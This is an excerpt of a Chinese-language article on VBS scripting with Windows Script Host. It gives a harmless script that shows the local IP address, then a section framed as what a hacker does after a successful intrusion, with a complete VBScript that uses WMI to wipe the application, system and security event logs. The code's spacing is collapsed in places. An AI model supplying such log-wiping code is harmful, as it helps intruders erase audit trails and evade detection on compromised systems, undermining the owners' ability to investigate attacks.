摘要:VBS脚本病毒的大量流行使我们对VBS的功能有了一个全新的认识,现在大家对它也开始重视起来。VBS代码在本地是通过Windows Script Host(WSH)解释执行的。VBS脚本的执行离不开WSH,WSH是微软提供的一种基于32位Windows平台的、与语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。利用WSH,用户能够操纵WSH对象、ActiveX对象、注册表和文件系统。 |
三、显示本机IP地址
有许多时候,我们需要知道本机的IP地址,使用各种软件虽然可以办到,但用VBS脚本也非常的方便。用记事本编辑如下内容:
1.DimWS
2.SetWS=CreateObject("MSWinsock.Winsock")
3.IPAddress=WS.LocalIP
4.MsgBox"LocalIP="&IPAddress
将上面的内容保存为ShowIP.vbs,双击执行即可得到本机IP地址。
四、利用脚本编程删除日志
入侵系统成功后黑客做的第一件事便是清除日志,如果以图形界面远程控制对方机器或是从终端登陆进入,删除日志不是一件困难的事,由于日志虽然也是作为一种服务运行,但不同于http,ftp这样的服务,可以在命令行下先停止,再删除,在命令行下用netstopeventlog是不能停止的,所以有人认为在命令行下删除日志是很困难的,实际上不是这样,比方说利用脚本编程中的VMI就可以删除日志,而且非常的简单方便。源代码如下:
1.strComputer="."
2.SetobjWMIService=GetObject("winmgmts:"_
3.&"{impersonationLevel=impersonate,(Backup)}!\\"&_
4.strComputer&"\root\cimv2")
5.dimmylogs(3)
6.mylogs(1)="application"
7.mylogs(2)="system"
8.mylogs(3)="security"
9.forEachlogsinmylogs
10.SetcolLogFiles=objWMIService.ExecQuery_
11.("Select*fromWin32_NTEventLogFilewhereLogFileName='"&logs&"'")
12.ForEachobjLogfileincolLogFiles
13.objLogFile.ClearEventLog()
14.Next
15.next
将上面的代码保存为cleanevent.vbs文件即可。在上面的代码中,首先获得object对象,然后利用其clearEventLog()方法删除日志。建立一个数组,application,security,system,如果还有其他日志也可以加入数组。然后用一个for循环,删除数组中的每一个元素,即各个日志。
责任编辑:Honey